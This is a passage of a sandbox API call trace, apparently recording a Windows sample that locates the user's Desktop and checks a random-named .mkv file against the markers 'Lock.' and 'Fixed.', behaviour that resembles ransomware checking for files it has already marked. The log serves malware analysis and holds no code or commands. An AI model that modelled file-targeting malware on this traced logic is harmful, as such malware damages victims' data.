wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.389] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.389] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0189.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0189.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UCS72GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CS72GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S72GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="72GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VnNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nNBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NBUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BUxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UxEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xEzx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ezx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zx.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UCS72GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CS72GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S72GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="72GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VnNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nNBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NBUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BUxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UxEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xEzx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ezx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zx.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0189.392] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0189.392] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0189.392] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0189.392] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0189.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.393] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0189.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0189.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.393] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0189.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0189.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.395] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.398] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.398] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/UCS72GVnNBUxEzx.mkv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaf7f30, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x72f31300, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0x72f31300, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x3c59, dwReserved0=0xf6e0006, dwReserved1=0xfc03, cFileName="UCS72GVnNBUxEzx.mkv", cAlternateFileName="UCS72G~1.MKV")) returned 0xaa58e0 [0189.400] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.400] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0189.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 